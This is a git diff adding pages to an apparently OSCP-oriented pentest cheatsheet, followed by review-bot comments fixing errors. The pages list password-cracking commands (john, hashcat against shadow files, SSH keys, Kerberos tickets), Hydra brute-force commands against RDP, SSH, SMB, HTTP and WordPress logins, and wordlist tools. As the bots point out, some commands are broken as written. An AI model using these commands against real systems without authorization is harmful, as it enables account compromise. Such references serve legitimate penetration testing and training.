diff --git a/docs/Password Attacks, Cracking & Decoding/Cracking Files.md b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md index 8318c86b3..42e08ecd4 100644 --- a/docs/Password Attacks, Cracking & Decoding/Cracking Files.md +++ b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md 
@@ -1 +1,87 @@ -Test \ No newline at end of file + +[Offensive Security Cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/cracking_files/) + + +## Cracking archives + +#### RAR +```shell +rar2john file.rar > rar_hashes.txt +john --wordlist=passwords.txt rar_hashes.txt +``` + +#### ZIP +```shell +zip2john file.rar > zip_hashes.txt +john --wordlist=passwords.txt zip_hashes.txt +``` + +#### ZIP Using fcrackzip +```shell +fcrackzip -u -D -p rockyou.txt recup.zip +``` + +## Cracking shadow files + +#### unshadow +```shell +unshadow passwd shadow > shadowjohn.txt +john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --rules shadowjohn.txt +john --show shadowjohn.txt +``` + +#### Hashcat SHA512 $6$ shadow file +```shell +hashcat -m 1800 -a 0 hash.txt rockyou.txt --username +``` + +#### Hashcat MD5 $1$ shadow file +```shell +hashcat -m 500 -a 0 hash.txt rockyou.txt --username +``` + + +## Various cracking techniques + +#### Hashcat MD5 Apache webdav file +```shell +hashcat -m 1600 -a 0 hash.txt rockyou.txt +``` + +#### Hashcat SHA1 +```shell +hashcat -m 100 -a 0 hash.txt rockyou.txt --force +``` + +#### Hashcat Wordpress +```shell +hashcat -m 400 -a 0 --remove hash.txt rockyou.txt +``` + +#### SSH Key +```shell +ssh2john id_rsa > sshtocrack +john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack +``` + +#### Cracking Cisco passwords +Type 5 → MD5 +Type 7 → Easy reversible +```shell +hashcat -m 500 c:\temp\ciscohash.txt C:\DICS\english-dic.txt +``` + +#### Cracking NTLVMv2 hashes +```shell +john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt +``` +------------------------------------------------------ + +## Cracking TGS + +#### Using John from bleeding repo +```shell +Go here /home/user/Desktop/Certifs/OSCP/Tools/PasswordCracking/JohnTheRipper/run + +./john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --fork=4 --format=krb5tgs 
/home/user/Desktop/HackTheBox/VM/Active/kerberos_hashes.txt +``` diff --git a/docs/Password Attacks, Cracking & Decoding/Hydra.md b/docs/Password Attacks, Cracking & Decoding/Hydra.md index 8318c86b3..c21a0136b 100644 --- a/docs/Password Attacks, Cracking & Decoding/Hydra.md +++ b/docs/Password Attacks, Cracking & Decoding/Hydra.md 
@@ -1 +1,126 @@ -Test \ No newline at end of file +## Hydra + +#### Hydra GUI +[xhydra](https://www.kali.org/tools/hydra/#hydra-gtk) +```bash +sudo apt install hydra-gtk +``` + + +#### RDP +```shell +hydra -V -f -L usernames.txt -P passwords.txt rdp://10.0.2.5 -V +hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip +``` + +#### SSH +```shell +hydra -l root -P passwords.txt -f ssh://10.0.2.5 -V +hydra $ip -s 22 ssh -l -P big_wordlist.txt +hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh +hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh +``` + +#### SMB +```shell +hydra -l Administrator -P passwords.txt -f smb://10.0.2.5 -V +hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb +hydra -L usernames.txt -P passwords.txt $ip smb -V -f +``` + +#### FTP +```shell +hydra -l root -P passwords.txt -f smb://10.0.2.5 -V +``` + +#### HTTP Basic Auth +```shell +hydra -L users.txt -P password.txt 10.0.2.5 http-get /login/ -V +Http get 401 login with a dictionary +hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin +``` + +#### HTTP Post +```shell +hydra -L users.txt -P password.txt 10.0.2.5 http-post-form +"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login +name or password is incorrect" -V + +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.216.57 http-post-form "/Account/login.aspx:__VIEWSTATE=AmInWQjOL%2BAHMc9qQ0CW0CFnlUXaqoRXEj%2FOvBixV%2Fld9p%2BKj%2B7mB%2FZ7FcrOxWmCkIjSfD9utiaSxAvSBmKz1VkaDvYW9b5sxJWoX3ZOskfQg0u3CsSjndshwiuLcEq7l%2BRc7FwwBs%2BvLvrnXfcLFt%2B0vNv1zwwLa3QoTUjG3V9hk0Sg&__EVENTVALIDATION=zMZzvwm4lfkTglvBFfLhbEjJu8yEheigLkmHJ7E8owtV2FVK0TTZdne0RExmMdPY5RORs4UuLmymoBfQmY8UwKaRwaqnpZkAM%2BPLgxPNj3wtiiTaC4jbJSUoKPCRWBtpMIz4vtdxr9zbhDPn5zB7IJSOpA%2FMzo6LYD9oiiaMKWUj8VNM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" +``` + +#### IMAP +```shell +hydra -l root 
-P passwords.txt -f imap://10.0.2.5 -V +``` + +#### MySQL +```shell +hydra -L usernames.txt -P pass.txt -f mysql://10.0.2.5 -V +``` + +#### POP +```shell +hydra -l USERNAME -P passwords.txt -f pop3://10.0.2.5 -V +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V +``` + +#### Redis +```shell +hydra –P password.txt redis://10.0.2.5 -V +``` + +#### Rexec +```shell +hydra -l root -P password.txt rexec://10.0.2.5 -V +``` + +#### Rlogin +```shell +hydra -l root -P password.txt rlogin://10.0.2.5 -V +``` + +#### RSH +```shell +hydra -L username.txt rsh://10.0.2.5 -V +``` + +#### RSP +```shell +hydra -l root -P passwords.txt rtsp +``` + +#### SNMP +```shell +hydra -P password-file.txt -v $ip snmp +``` + +#### SMTP +```shell +hydra -l -P /path/to/passwords.txt smtp -V +hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V +hydra -l -P /path/to/passwords.txt -s 587 -S -v -V +#Port 587 for SMTP with SSL +``` + +#### Telnet +```shell +hydra -l root -P passwords.txt [-t 32] telnet +``` + +#### VNC +```shell +hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s + vnc +``` + +#### Wordpress +```shell +hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' +``` + +#### LDAP +```shell +hydra -L users.txt -P passwords.txt $ip ldap2 -V -f +``` + diff --git a/docs/Password Attacks, Cracking & Decoding/Wordlists.md b/docs/Password Attacks, Cracking & Decoding/Wordlists.md index be7031091..e4d459293 100644 --- a/docs/Password Attacks, Cracking & Decoding/Wordlists.md +++ b/docs/Password Attacks, Cracking & Decoding/Wordlists.md 
@@ -1,30 +1,27 @@ - -> [!NOTE] Resources - +#### Wordlists references [Kaonashi](https://github.com/kaonashi-passwords/Kaonashi) [richelieu](https://github.com/tarraschk/richelieu) [rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) [packetstormsecurity](https://packetstormsecurity.com/Crackers/wordlists/page4/) [gwicks dictionaries](http://www.gwicks.net/dictionaries.htm) - -SCADA Default Passwords +[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public) [critifence](http://www.critifence.com/default-password-database/) [weakpass](https://weakpass.com/) [berzerk0](https://github.com/berzerk0/Probable-Wordlists) -Looks very cool wordlists -[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public) +#### seclist ```shell title:"Wordlists" sudo apt-get install seclists ls /usr/share/wordlists ----------------------------------------------------------------------------------- -#CeWL -# CeWL allows you to build custom wordlists based on online resources -# If you know that your target is target.com, you can parse web content to build lists -# Can be time consuming +``` + +#### CeWL +CeWL allows you to build custom wordlists based on online resources. If you know that your target is target.com, you can parse web content to build lists. Can be time consuming. + +```bash # 5 levels of depth and minimum 7 char per word cewl -w customwordlist.txt -d 5 -m 7 www.sans.org 
@@ -33,21 +30,19 @@ cewl -w customwordlist.txt -d 5 -m 7 -o www.sans.org # Include e-mail adresses cewl -w customwordlist.txt -d 5 -m 7 -e www.sans.org +``` ----------------------------------------------------------------------------------- -PACK -# Password Analysis and Cracking Kit -# You can get stats about already cracked passwords -# In order to define new masks -https://github.com/iphelix/pack +#### PACK +Password Analysis and Cracking Kit. You can get stats about already cracked passwords, In order to define new masks https://github.com/iphelix/pack +```bash python statsgen.py rockyou.txt +``` + +#### Combinator +Combinator is part of the hashcat-utils. It can be used to prepare a combinated wordlist for cracking. It allows then to combination + others settings like masks or rules. ----------------------------------------------------------------------------------- -Combinator -# Combinator is part of the hashcat-utils -# It can be used to prepare a combinated wordlist for cracking -# It allows then to combination + others settings like masks or rules +```bash combinator.exe file1 file2 # It can create MASSIVE wordlists and take some time to run. @@ -59,4 +54,3 @@ combinator2.exe file1 file2 file3 combinator.exe file1 file2 | hashcat -m x hashs.file -a 0 --force -O ``` -
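Review bot: In the ZIP block of `docs/Password Attacks, Cracking & Decoding/Cracking Files.md`, `zip2john file.rar > zip_hashes.txt` feeds a `.rar` file to `zip2john` (copied from the RAR block just above it); it should read `zip2john file.zip > zip_hashes.txt`. In the same hunk, the unshadow and TGS examples hard-code user-specific paths (`/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt`, `/home/user/Desktop/HackTheBox/VM/Active/kerberos_hashes.txt`) while the SSH key example uses `/usr/share/wordlists/rockyou.txt`; use the latter everywhere so the commands run on a stock Kali install, and take the sentence `Go here /home/user/Desktop/Certifs/OSCP/Tools/PasswordCracking/JohnTheRipper/run` out of the shell fence, since it is prose, not a command (if the point is that `--format=krb5tgs` needs the jumbo build of john, say so in the heading or a `#` comment, and the hashcat equivalent `-m 13100` is worth listing next to it). The SHA1 example should lose `--force`: it silences warnings such as an unsupported OpenCL runtime and can produce silently wrong results, so it does not belong in a reference command. The heading `Cracking NTLVMv2 hashes` should be `Cracking NetNTLMv2 hashes` to match `--format=netntlmv2`. Under Cisco, `Type 7 → Easy reversible` is correct, but the text should say that Type 7 is reversible obfuscation that is decoded, not cracked, and that the `-m 500` command applies to Type 5 only; the Windows paths `c:\temp\ciscohash.txt` and `C:\DICS\english-dic.txt` are also out of step with the Linux paths used in the rest of the file. Finally, the `------` rule before `## Cracking TGS` is not used anywhere else in this doc; the `##` heading already separates the sections.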
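Review bot: In `docs/Password Attacks, Cracking & Decoding/Hydra.md` the FTP block is a copy of the SMB one: `hydra -l root -P passwords.txt -f smb://10.0.2.5 -V` under `#### FTP` should target `ftp://10.0.2.5`. Several other commands in this hunk cannot run as written: `hydra $ip -s 22 ssh -l -P big_wordlist.txt` gives `-l` no username; both `hydra -l -P /path/to/passwords.txt ...` SMTP lines lack a username and a target host; the RTSP and Telnet lines lack a target (and the `[-t 32]` placeholder brackets should go); the VNC line has `-s` with no port number and a stray `+` before `vnc`. The Redis and VNC lines use an en-dash `–P` where hydra expects `-P`, which it will reject as an unknown option. `/usr/share/wordlistsnmap.lst` in the POP and SMTP blocks is missing a slash (`/usr/share/wordlists/nmap.lst`). The first HTTP Post example splits the form spec over three lines with no line continuation, so the double quote opened at `"/path/index.php:...` is never closed on that line; join it into one line or add `\` continuations so the whole `"/path:params:failure-string"` argument is quoted. The second HTTP Post example embeds `__VIEWSTATE` and `__EVENTVALIDATION` values and the address `10.10.216.57` captured from one particular target; add a sentence saying these are target-specific and must be re-captured from the live login page before reuse. Minor: `-V` appears twice in the first RDP line and `-u` twice in two SSH lines; `Http get 401 login with a dictionary` sits inside the HTTP Basic Auth shell fence and should be a `#` comment or prose; the `RSP` heading should read `RTSP`; the Wordpress form value `wp-submit=Log In` carries an unencoded space and should be `Log+In`; and the `#Port 587 for SMTP with SSL` comment is imprecise, since 587 is the submission port that normally uses STARTTLS, whereas hydra's `-S` negotiates TLS immediately, which is what port 465 expects.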
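Review bot: In the first hunk of `docs/Password Attacks, Cracking & Decoding/Wordlists.md`, removing the `SCADA Default Passwords` label leaves `[critifence](http://www.critifence.com/default-password-database/)` listed as if it were a general-purpose wordlist when it is a default password database; keep a short label next to that link (dropping `Looks very cool wordlists` is fine, since the FlameOfIgnis link now sits in the main list). In the `#### seclist` block, `sudo apt-get install seclists` followed by `ls /usr/share/wordlists` will not show what was just installed: the Kali package places its lists under `/usr/share/seclists`, so list that path (or both). The heading should be `#### SecLists` to match the project name, and the fence info string `shell title:"Wordlists"` is an editor-specific extension that the other fences in this file do not use; confirm the docs renderer supports it or reduce it to `shell`. In the CeWL paragraph, `Can be time consuming.` is a sentence fragment; something like `Crawling several levels deep can take a long time.` reads better.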
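Review bot: In the second hunk of `Wordlists.md`, the Combinator sentence `It allows then to combination + others settings like masks or rules.` is ungrammatical; suggest `The result can then be combined with other attack settings such as masks or rules.` The PACK paragraph is a run-on with a bare URL: `Password Analysis and Cracking Kit. You can get stats about already cracked passwords, In order to define new masks https://github.com/iphelix/pack` reads better as `Password Analysis and Cracking Kit ([iphelix/pack](https://github.com/iphelix/pack)). It produces statistics about already cracked passwords, which you can use to define new masks.` The examples use `combinator.exe` and `combinator2.exe`, but on Linux hashcat-utils builds `combinator.bin`, and the rest of this doc is Linux-oriented, so either show the `.bin` names or state that the `.exe` names are for Windows. As in Cracking Files.md, the piped example `combinator.exe file1 file2 | hashcat -m x hashs.file -a 0 --force -O` should not carry `--force` in a reference command (`-O` is fine, but note that optimized kernels cap the supported password length), and `hashs.file` should be `hashes.file`.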